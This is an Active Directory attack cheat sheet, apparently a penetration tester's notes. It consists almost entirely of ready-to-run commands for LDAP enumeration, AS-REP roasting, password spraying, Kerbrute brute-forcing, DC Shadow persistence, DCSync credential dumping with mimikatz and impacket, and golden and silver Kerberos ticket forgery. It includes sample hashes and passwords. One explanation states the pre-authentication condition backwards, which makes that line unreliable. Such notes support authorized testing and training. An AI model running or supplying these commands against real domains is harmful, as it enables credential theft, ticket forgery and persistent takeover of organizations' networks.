Enumeration
Basic ldap enumeration
python3 /opt/enum4linux-ng/enum4linux-ng.py -A 1.3.3.7 -p Password123-u morph3
python windapsearch.py -u morph3 -p morph3 -d evil.corp --dc-ip 192.168.1.2
python ad-ldap-enum.py -d contoso.com -l 10.0.0.1 -u Administrator -p P@ssw0rd
LDAP Queries
Get all the users
Get-ADUser -LDAPFilter "(objectClass=user)"
Dump ldap fully
export LDAPTLS_REQCERT=never
ldapsearch -LLL -x -H ldaps://dc.foobar.local -b 'dc=foobar,dc=local' -s sub '(objectclass=*)' -D 'test@foobar.local' -w foobar
AS-Rep Roasting
If a user has pre auth enabled, you grab his/her hash
impacket-GetNPUsers ecorp.local/ -format hashcat -usersfile ./users -dc-ip 10.3.3.7
Bruteforcing - Password Spraying
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
Kerbrute
Kerberos(port 88) bruteforcing
# Password brute
./kerbrute_linux_amd64 bruteuser -d evil.corp --dc 192.168.1.2 rockyou.txt morph3
# Username brute
./kerbrute_linux_amd64 userenum -d evil.corp --dc 192.168.1.2 users.txt
# Password spray
./kerbrute_linux_amd64 passwordspray -d evil.corp --dc 192.168.1.2 users.txt rockyou.txt
DC Shadow
-This is a persistence attack-
DC Shadow attack aims to inject malicious Domain Controlllers into AD infrastructure so that we can dump actual AD members.
Find sid for that user
wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid
This will create a RPC Server and listen
lsadump::dcshadow /object:"CN=morph3,OU=Business,OU=Users,OU=ECORP,DC=ECORP,DC=local" /attribute:sidhistory /value:sid
Run this from another mimikatz
lsadump::dcshadow /push
After this, unregistration must be done. Relogin now and perform DCSync
lsadump::dcsync /domain:ECORP.local /account:krbtgt
DC Sync
Using mimikatz,
lsadump::dcsync /domain:domain /all /csv
lsadump::dcsync /user:krbtgt
Using DCSync.ps1,
https://gist.github.com/monoxgas/9d238accd969550136db
powershell.exe -c "Import-Module .\Invoke-DCSync.ps1; Invoke-DCSync -PWDumpFormat"
Using secretdumps module from impacket,
python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
python secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit LOCAL
impacket-secretsdump morph3@10.11.1.75
Domain Trust
get-domaintrustmapping
We get current domain or target domain sid using Get-DomainSID
kerberos::golden /user:Administrator /domain:<curr_domain> /sid:<curr_domain_sid> /krbtgt:<curr_domain_krbtgt_hash> /sids:<target_domain_sid> /ptt
Golden Ticket
Use krbtgt's hash and you can forge tickets for anyone.
Get krbtgt hash,
lsadump::dcsync /all /csv
You might want to patch it
lsadump::lsa /patch
lsadump::trust /patch
Forging the ticket
/rc4 or /krbtgt -> krbtgt hash
/ticket -> this parameter is optional but default is ticket.kirbi
/groups -> this parameter is optional but default is 513,512,520,518,519
/ptt -> switch to perform ptt
kerberos::golden /user:morph3 /domain:evil.corp /sid:domains-sid /krbtgt:krbtgt-hash /ticket:ticket.kirbi /groups:501,502,513,512,520,518,519
kerberos::ptt ticket.kirbi
After this, your final ticket should be ready. You can also verify by using the following command that it is in your cache.
You can now verify it is working.
dir \\DC\C$
psexec.exe \\DC cmd.exe
purge it
If you want to use metasploit
post/windows/escalate/golden_ticket
Silver Ticket
Service accounts
ticketer,
python3 /opt/impacket/examples/ticketer.py -domain scrm.local -user sqlsvc -password Pegasus60 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 ksimpson -spn MSSQLSvc/dc1.scrm.local -nthash B999A16500B87D17EC7F2E2A68778F05
